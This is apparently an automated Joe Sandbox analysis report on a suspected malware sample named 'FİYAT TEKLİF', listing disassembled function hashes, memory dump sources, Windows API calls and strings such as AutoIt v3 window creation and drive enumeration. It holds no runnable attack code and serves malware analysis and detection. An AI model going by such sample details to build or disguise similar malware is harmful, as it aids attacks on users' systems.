Opcode ID: 02b79721f2bbe7253eff5d8712cc9973861cce51cf7d08b17b682af878f2009c
Instruction ID: b1f24d40c249058953428538a0e57ea5b9824cc859a9a90d66fa19601f6d79b7
Opcode Fuzzy Hash: 02b79721f2bbe7253eff5d8712cc9973861cce51cf7d08b17b682af878f2009c
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 009A781B Relevance: 1.5, Strings: 1, Instructions: 214COMMON

Download Yara Rule

Strings

0, xrefs: 009A798B

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
Instruction ID: 4557397f1efb42b266cd4e75690e0bde83ce5fee815add57a66017f868a4cc99
Opcode Fuzzy Hash: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
Instruction Fuzzy Hash: 6A51356260C6056BDB3885EC8C9F7BFE78D9B83340F18091AD886D7282CA1DDE45D3D6

Uniqueness

Uniqueness Score: -1.00%

Function 009B6DD9 Relevance: .6, Instructions: 637COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 45e6d4afdbd5d2606eceac6d7bb8938e3534ef40204919e0bf1e28e00670289e
Instruction ID: 7fa442219ddc8a2b4da4febef32f4ed9c3fa8bf28586446d6236d08d62a396ea
Opcode Fuzzy Hash: 45e6d4afdbd5d2606eceac6d7bb8938e3534ef40204919e0bf1e28e00670289e
Instruction Fuzzy Hash: 15320122D29F014DD7339678C922335A68DAFB73E5F15D737F81AB59A9EB29C4834200

Uniqueness

Uniqueness Score: -1.00%

Function 0099CC39 Relevance: .6, Instructions: 635COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7af43cc4e2ed9c9ded99e426b11dc461b5f8c5438a787838734098625c346984
Instruction ID: 88459ba00d6a3648fce73c032a4e7a023f214973bb79a20d6011e4f48eb7a1fd
Opcode Fuzzy Hash: 7af43cc4e2ed9c9ded99e426b11dc461b5f8c5438a787838734098625c346984
Instruction Fuzzy Hash: D53205B2A801178BDF28CF68C89467D7BA9EB45301F28CD6BD489DB391E635DD81DB40

Uniqueness

Uniqueness Score: -1.00%

Function 00987920 Relevance: .6, Instructions: 563COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4b907c1bd098effdaa2f70e83e8a6b2bbbdf88b4977e4e65f0b5b6c96e8b11c
Instruction ID: 3522f4bff94667dd9a3e30eafdcfb5f3aa1e1d49d2c6cfcabb02be104adb03e3
Opcode Fuzzy Hash: f4b907c1bd098effdaa2f70e83e8a6b2bbbdf88b4977e4e65f0b5b6c96e8b11c
Instruction Fuzzy Hash: BE227E70E0460ADBDF14DFA4C941BAEB7B6FF84300F244529E816A7391EB36E951CB51

Uniqueness

Uniqueness Score: -1.00%

Function 009891C0 Relevance: .5, Instructions: 475COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 60a5159dbe6c45abb791f32403d262f30d38a79efb18e40d5fa4bb9bed4f9f13
Instruction ID: aca6331fb5bab3d980870478c845fd1acdf14f666cde8fb26ec67455ec5de2da
Opcode Fuzzy Hash: 60a5159dbe6c45abb791f32403d262f30d38a79efb18e40d5fa4bb9bed4f9f13
Instruction Fuzzy Hash: C30281B1E0020AEBDF04DF54D881BAEB7B5FF84300F148569E8169B391EB35AE51CB91

Uniqueness

Uniqueness Score: -1.00%

Function 009B9EEE Relevance: .3, Instructions: 294COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f356b4e052dc7c42f1bf61b2962ceac6710de5a30d98c60e8b797f313fde6c1
Instruction ID: 1b3a1071470d6215ad766fb7404302d2574fdf6e8a88a1733337b0cc1df04f2a
Opcode Fuzzy Hash: 5f356b4e052dc7c42f1bf61b2962ceac6710de5a30d98c60e8b797f313fde6c1
Instruction Fuzzy Hash: FDB10221D2AF414DC723D6398831336B65CAFBB6D5F91D72BFC2678D22EB2686834140

Uniqueness

Uniqueness Score: -1.00%

Function 009A7A4A Relevance: .2, Instructions: 237COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cce7e308a26ed1cefe69abd711f5f3a0a1ffc338f9c58f75ed1890d7aade6137
Instruction ID: 5c6e32b0d67c2296adee997b3da0d0a37a1788db8cff56a9c0338885234c5be5
Opcode Fuzzy Hash: cce7e308a26ed1cefe69abd711f5f3a0a1ffc338f9c58f75ed1890d7aade6137
Instruction Fuzzy Hash: 1E6139B160870966DE349AE88D97BBFF39CDF83710F140D19E882DB281DA159E4283E5

Uniqueness

Uniqueness Score: -1.00%

Function 009A7CA7 Relevance: .2, Instructions: 237COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 602fa21d47bc1a734185e6adb1990ce9f31b30cf76068d9a7ca6f159d945241f
Instruction ID: 3c99b57b3f95bed0b5b6c5b895ea2cc8f44e6e56dedb9b66cc106f53498fd4a3
Opcode Fuzzy Hash: 602fa21d47bc1a734185e6adb1990ce9f31b30cf76068d9a7ca6f159d945241f
Instruction Fuzzy Hash: 8F61783160870966DE384AE84C67BBFE39CEF83700F200D59E843CB2D1EA169D42C2D5

Uniqueness

Uniqueness Score: -1.00%

Function 023536C0 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3704784227.0000000002350000.00000040.00001000.00020000.00000000.sdmp, Offset: 02350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2350000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
Instruction ID: ce48efeb9de1cf7662a1cebf5cc42527772d9180158267196707add3785d1118
Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
Instruction Fuzzy Hash: FD41B3B1D1051CEBCF48CFADC991AEEBBF2AF88201F548299D516AB345D730AB41DB50

Uniqueness

Uniqueness Score: -1.00%

Function 009F2046 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bd6a01079ac20f018c1ed97dc08f8b9f8c34732ff98459d1dcd73203ada8b228
Instruction ID: 6153cdae0ca99b331ab0b138bbbd601b8f0785471e84a6672b7ad7a3a9e08ab6
Opcode Fuzzy Hash: bd6a01079ac20f018c1ed97dc08f8b9f8c34732ff98459d1dcd73203ada8b228
Instruction Fuzzy Hash: 9321A8326206158BDB28CF79C81277A73E9B754310F19862EE4A7C37D0DE35A904C780

Uniqueness

Uniqueness Score: -1.00%

Function 023535B0 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3704784227.0000000002350000.00000040.00001000.00020000.00000000.sdmp, Offset: 02350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2350000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
Instruction ID: 681417f2018fdc4f5f50ab3267cde9b89b3727a08cf49257f044d1b6599e1998
Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
Instruction Fuzzy Hash: 4A018078A01109EFCB44DF98C5909AEFBB5FB48350B2085D9DC19A7701D730AE51DB80

Uniqueness

Uniqueness Score: -1.00%

Function 02353550 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3704784227.0000000002350000.00000040.00001000.00020000.00000000.sdmp, Offset: 02350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2350000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
Instruction ID: 719eb28a1a3cee95ca303c45c3a9bd21acb5552a045634b208c276839b39635d
Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
Instruction Fuzzy Hash: C9018078A00109EFCB44DF98C5909AEFBB5FB48350B2085D9DC19A7701D730AE41DB80

Uniqueness

Uniqueness Score: -1.00%

Function 02351ED0 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3704784227.0000000002350000.00000040.00001000.00020000.00000000.sdmp, Offset: 02350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2350000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48

Uniqueness

Uniqueness Score: -1.00%

Function 00A02ADE Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 486filecommemoryCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00A02B30
DeleteObject.GDI32(00000000), ref: 00A02B43
DestroyWindow.USER32 ref: 00A02B52
GetDesktopWindow.USER32 ref: 00A02B6D
GetWindowRect.USER32(00000000), ref: 00A02B74
SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 00A02CA3
AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00A02CB1
CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00A02CF8
GetClientRect.USER32(00000000,?), ref: 00A02D04
CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00A02D40
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00A02D62
GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00A02D75
GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00A02D80
GlobalLock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00A02D89
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00A02D98
GlobalUnlock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00A02DA1
CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00A02DA8
GlobalFree.KERNEL32(00000000), ref: 00A02DB3
CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00A02DC5
OleLoadPicture.OLEAUT32(?,00000000,00000000,00A1FC38,00000000), ref: 00A02DDB
GlobalFree.KERNEL32(00000000), ref: 00A02DEB
CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 00A02E11
SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 00A02E30
SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00A02E52
ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00A0303F

Strings

static, xrefs: 00A02D3A, 00A02E91
DISPLAY, xrefs: 00A02EA2
AutoIt v3, xrefs: 00A02CF2
, xrefs: 00A02FC5

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
String ID: $AutoIt v3$DISPLAY$static
API String ID: 2211948467-2373415609
Opcode ID: e74de03193ddc810eadf6924ba3652a72bac2b10d83ec6fb9245244efb2339af
Instruction ID: 51dbfbcc6508dc7f5d3c5d95e3e81a0a6451272ceafaf17bf12cab2e66858476
Opcode Fuzzy Hash: e74de03193ddc810eadf6924ba3652a72bac2b10d83ec6fb9245244efb2339af
Instruction Fuzzy Hash: 1B028B71900209AFDB14DFA4DC89FAE7BB9FB49720F148158F915AB2A1CB70ED01CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00A170D5 Relevance: 49.8, APIs: 33, Instructions: 273COMMON

Download Yara Rule

APIs

SetTextColor.GDI32(?,00000000), ref: 00A1712F
GetSysColorBrush.USER32(0000000F), ref: 00A17160
GetSysColor.USER32(0000000F), ref: 00A1716C
SetBkColor.GDI32(?,000000FF), ref: 00A17186
SelectObject.GDI32(?,?), ref: 00A17195
InflateRect.USER32(?,000000FF,000000FF), ref: 00A171C0
GetSysColor.USER32(00000010), ref: 00A171C8
CreateSolidBrush.GDI32(00000000), ref: 00A171CF
FrameRect.USER32(?,?,00000000), ref: 00A171DE
DeleteObject.GDI32(00000000), ref: 00A171E5
InflateRect.USER32(?,000000FE,000000FE), ref: 00A17230
FillRect.USER32(?,?,?), ref: 00A17262
GetWindowLongW.USER32(?,000000F0), ref: 00A17284

Part of subcall function 00A173E8: GetSysColor.USER32(00000012), ref: 00A17421
Part of subcall function 00A173E8: SetTextColor.GDI32(?,?), ref: 00A17425
Part of subcall function 00A173E8: GetSysColorBrush.USER32(0000000F), ref: 00A1743B
Part of subcall function 00A173E8: GetSysColor.USER32(0000000F), ref: 00A17446
Part of subcall function 00A173E8: GetSysColor.USER32(00000011), ref: 00A17463
Part of subcall function 00A173E8: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00A17471
Part of subcall function 00A173E8: SelectObject.GDI32(?,00000000), ref: 00A17482
Part of subcall function 00A173E8: SetBkColor.GDI32(?,00000000), ref: 00A1748B
Part of subcall function 00A173E8: SelectObject.GDI32(?,?), ref: 00A17498
Part of subcall function 00A173E8: InflateRect.USER32(?,000000FF,000000FF), ref: 00A174B7
Part of subcall function 00A173E8: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00A174CE
Part of subcall function 00A173E8: GetWindowLongW.USER32(00000000,000000F0), ref: 00A174DB

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
String ID:
API String ID: 4124339563-0
Opcode ID: 6bbb15455125bec14f748eb585703711468fbcfd61923d9624273c1ae33233a3
Instruction ID: 3e526358c7c758e4d17de72caf896cf69b56a2eab741ba1bac56109b4e70e91a
Opcode Fuzzy Hash: 6bbb15455125bec14f748eb585703711468fbcfd61923d9624273c1ae33233a3
Instruction Fuzzy Hash: 60A17F72088301BFD701DFA4DC48A9E7BBAFB49330F105B19F962961A1D771E9468B51

Uniqueness

Uniqueness Score: -1.00%

Function 00A02711 Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 330windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000), ref: 00A0273E
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00A0286A
SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 00A028A9
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00A028B9
CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 00A02900
GetClientRect.USER32(00000000,?), ref: 00A0290C
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 00A02955
CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00A02964
GetStockObject.GDI32(00000011), ref: 00A02974
SelectObject.GDI32(00000000,00000000), ref: 00A02978
GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 00A02988
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00A02991
DeleteDC.GDI32(00000000), ref: 00A0299A
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00A029C6
SendMessageW.USER32(00000030,00000000,00000001), ref: 00A029DD
CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 00A02A1D
SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00A02A31
SendMessageW.USER32(00000404,00000001,00000000), ref: 00A02A42
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 00A02A77
GetStockObject.GDI32(00000011), ref: 00A02A82
SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00A02A8D
ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 00A02A97

Strings

static, xrefs: 00A0294F, 00A02A71
msctls_progress32, xrefs: 00A02A13
DISPLAY, xrefs: 00A0295A
AutoIt v3, xrefs: 00A028F8

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
String ID: AutoIt v3$DISPLAY$msctls_progress32$static
API String ID: 2910397461-517079104
Opcode ID: 895242c2b9885ec98663178fc4c42c8acce3e3c69ff369d2a56579a48ea6219e
Instruction ID: 8475ba6bc890c3d0e2f8b696d1ba927ca2fec67f95b48c2b6aa8f0cd5005c9f7
Opcode Fuzzy Hash: 895242c2b9885ec98663178fc4c42c8acce3e3c69ff369d2a56579a48ea6219e
Instruction Fuzzy Hash: E2B15A71A40219AFEB14DFA8DC49FAE7BA9FB48721F008514F914EB2D0D770AD41CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 009F4ADF Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 191COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 009F4AED
GetDriveTypeW.KERNEL32(?,00A1CB68,?,\\.\,00A1CC08), ref: 009F4BCA
SetErrorMode.KERNEL32(00000000,00A1CB68,?,\\.\,00A1CC08), ref: 009F4D36

Strings

1394, xrefs: 009F4C9F
Network, xrefs: 009F4C02
SSD, xrefs: 009F4C4A
RAID, xrefs: 009F4CBB
iSCSI, xrefs: 009F4CC2
ATA, xrefs: 009F4C98
Unknown, xrefs: 009F4BED, 009F4C83
SSA, xrefs: 009F4CA6
SATA, xrefs: 009F4CD0
SCSI, xrefs: 009F4C8A
FileBackedVirtual, xrefs: 009F4CEC
CDROM, xrefs: 009F4BFB
Removable, xrefs: 009F4C10, 009F4C15
RAMDisk, xrefs: 009F4BF4
\\.\, xrefs: 009F4B3F
Virtual, xrefs: 009F4CE5
MMC, xrefs: 009F4CDE
PhysicalDrive, xrefs: 009F4B76
SAS, xrefs: 009F4CC9
Fixed, xrefs: 009F4C09
USB, xrefs: 009F4CB4
ATAPI, xrefs: 009F4C91
Fibre, xrefs: 009F4CAD

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: ErrorMode$DriveType
String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
API String ID: 2907320926-4222207086
Opcode ID: 04121d1343306255866a21e0c1d1bf5b6c78dc268aaca7d97f59dfd09e5dff66
